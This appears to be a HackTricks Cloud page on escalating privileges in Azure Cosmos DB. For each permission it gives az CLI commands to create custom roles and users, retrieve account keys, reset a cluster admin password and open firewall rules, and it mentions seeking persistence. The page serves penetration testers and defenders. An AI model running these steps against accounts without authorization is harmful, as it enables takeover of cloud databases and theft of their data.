HackTricks CloudAz - CosmosDB Privesc
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
CosmosDB Privesc
For more information about SQL Database check:
(Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write, Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read) & (Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write, Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read)
With this permissions you can priviledgeescalate giving a user the pemrissions to execute queries and connect to the database. First a definition role is created giving the necesary permissions and scopes.
az cosmosdb sql role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<Random-Unique-ID>", # For example 12345678-1234-1234-1234-123456789az
"RoleName": "CustomReadRole",
"Type": "CustomRole",
"AssignableScopes": [
"/subscriptions/<subscription_id>/resourceGroups/sqldatabase/providers/Microsoft.DocumentDB/databaseAccounts/<account_name>"
],
"Permissions": [
{
"DataActions": [
"Microsoft.DocumentDB/databaseAccounts/readMetadata",
"Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/items/read",
"Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/*"
]
}
]
}'
After that the assigment of the definition is given to a user. After this that user can use the DefaultAzureCredential() connection method to execute queries.
az cosmosdb sql role assignment create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--role-definition-id <Random-Unique-ID-used-in-definition> \
--principal-id <principal_id-togive-perms> \
--scope "/"
(Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write && Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read)&& (Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write && Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read)
With this permission, you can create new MongoDB role definitions within an Azure Cosmos DB account. This allows defining custom roles with specific permissions for MongoDB users. RBAC functionalities must be enabled to use this.
az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'
You can create new MongoDB user definitions within an Azure Cosmos DB account. This allows the provisioning of users with specific roles and access to MongoDB databases.
az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "<myUser>",
"Password": "<mySecurePassword>",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'
After that a new user is created within the MongoDB, we can access it:
mongosh "mongodb://<myUser>:<mySecurePassword>@<account_name>.mongo.cosmos.azure.com:10255/<mymongodatabase>?ssl=true&replicaSet=globaldb&retrywrites=false"
Microsoft.DocumentDB/databaseAccounts/listKeys/action
With this permission, you can retrieve the primary and secondary keys for an Azure Cosmos DB account. These keys provide full access to the database account and its resources, enabling actions such as data reads, writes, and configuration changes.
az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>
Microsoft.DocumentDB/mongoClusters/read , Microsoft.DocumentDB/mongoClusters/write
With this permission, you can create, update, or delete MongoDB clusters on Azure Cosmos DB. This includes provisioning new clusters, modifying existing cluster configurations, decommissioning clusters, or changing the admin user's password.
az cosmosdb mongocluster update \
--cluster-name <cluster-name> \
--resource-group <res-group> \
--administrator-login "<username>" \
--administrator-login-password "<password>"
Microsoft.DocumentDB/mongoClusters/read , Microsoft.DocumentDB/mongoClusters/firewallRules/write
With this permission, you can create or modify firewall rules for a MongoDB cluster on Azure Cosmos DB. This allows control over which IP addresses or ranges can access the cluster. Unauthorized or improper use of this permission could expose the cluster to unwanted or malicious access.
# Create Rule
az cosmosdb mongocluster firewall-rule create \
--cluster-name <cluster-name> \
--resource-group <res-group> \
--rule-name <rule-name> \
--start-ip-address <start_ip> \
--end-ip-address <end_ip>
Note that by the time of the writing, MongoDB vCore doesn't support to create users internally, which would be great for persistence purposes:
mongos] test> db.createUser({
user: "adminUser",
pwd: "securePassword",
roles: [ { role: "root", db: "admin" } ]
})
MongoServerError[CommandNotSupported]: CreateUser command is not supported
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.